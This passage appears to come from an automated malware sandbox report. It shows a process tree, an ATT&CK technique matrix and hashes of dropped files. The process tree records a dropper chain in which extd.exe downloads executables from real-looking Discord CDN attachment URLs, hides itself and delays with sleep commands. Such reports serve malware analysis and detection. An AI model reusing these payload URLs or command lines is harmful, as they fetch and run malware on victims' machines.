                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/871062083159068702/welldone.exe" "welldone.exe" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:1136
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\17018\welldone.exe
                                                                                                                                                                                                                                                                    welldone.exe
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:304
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:2016
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\clip.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\clip.exe"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:5376
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\9554.bat C:\Users\Admin\AppData\Local\Temp\clip.exe"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:5452
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:2128
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                PID:1312
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/871062086757789726/clo.exe" "clo.exe" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:640
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\27767\clo.exe
                                                                                                                                                                                                                                                                                  clo.exe
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\27767\clo.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\27767\clo.exe
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:1992
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9552.tmp\9553.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:3628
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4168

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                              5
                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                              5
                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                105020a5adae7d6d8a50cb75abd6e3ec

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                2d799b226bfa04761f770bb53fe535bdf138aa5f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                01aaaa7500eeeb4b4abcf335a91dc743d0b8185690317bbfd8cc1f9acd68f6dd

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3a08502f3f519740413306f728a342135c9cfa03b25e2b77e84e4f2ca3fe0240a2fe7d5464c2ebca7a1b6a9336966c9ef85092bea2670f85fd7c3d9f2375f33d

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                2cb76f8ce39d4a02f00f8d56c8c3b9a4

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                3d481cd4b8762ab1085ac425bb241d3c4d59de16

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                b7d8ac1bc3941ca96a32e8b71cbd38d71619945570f8483405a395c17ef0cc12

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                7c0960df78e2859a7b486887430cbd199366dcc54862f03575dc995d89d8b4fcb004a1b03345a910fdae4c8986cd8ad1460c64beba69af440e92497af8d646ef

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                7c81a9d4c9ada948ecce81d00683f89a

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                48eb25b0e6def56d7fe86a83f07bfd71cf6d73a5

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                9c2a3f8909872cb65d373b751ce0944378322d616cef2f7fd3afef5731d6cc92

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                e08731117ed5eaf83e1d2417f98a16a9052108612812d503f139910c53653ce0bc010face0b34e602067bd810e893e6eb87eae1bf313855a75fb411e36a164bb

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                522df815ea7b7c0f819d043e1b669c23

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                18a2a3647d6ca8b55b6110e89d4799d4c58df56e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                7b219c14e328d84a923f5f53075d76daa6278f000fc94f0fb7d5d165fe0846eb

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                60074e0f1e6409431814a8557fc3471cc504ec6f6253012708b33ab004a9b2926cbf34143073fb0a771f79015e7ceff5a08aea0786a4806f7abb5e119c57f92b

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                c2ed0767b1cab8e9ed6ef51a0f8ff3cb

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                39f0407673354aec051746d78867b1e6ea8a4550

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                f90a17bff303c25e5e13ba1736f879afcf9d95e2c1572606d3bb1bb33a1c7c04

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                586c44b8637efe78091d1db9b259aae3311792d0242c74ff29042bbe307eaf6f9242a5ef231e992aac7c66480fa75b3628b13aea17e749bf1c571f3f718bf566

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6a598cb90b065803d1818bb7bf30b8a9

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                43ae6caddd16c83e966f9d9d08ad44e74047d6fe

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                4418fc3eb23531386888ba12b2f4e7c236b745a978994bd508d0c943189ee236

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                0778617d4e58c6d0fb0431cc8b3557d0b541c206910372bcb610c10f605138213f934f31cd7bed51a8ee4617cdf417965912385585e1e39219e458fb3da5f1a1

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\libcurl.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\libcurlpp.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\libstdc++-6.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\setup_install.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\setup_install.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_2.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_2.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_3.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_3.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_4.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_4.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_5.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_5.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_6.exe
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_6.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                                SHA256

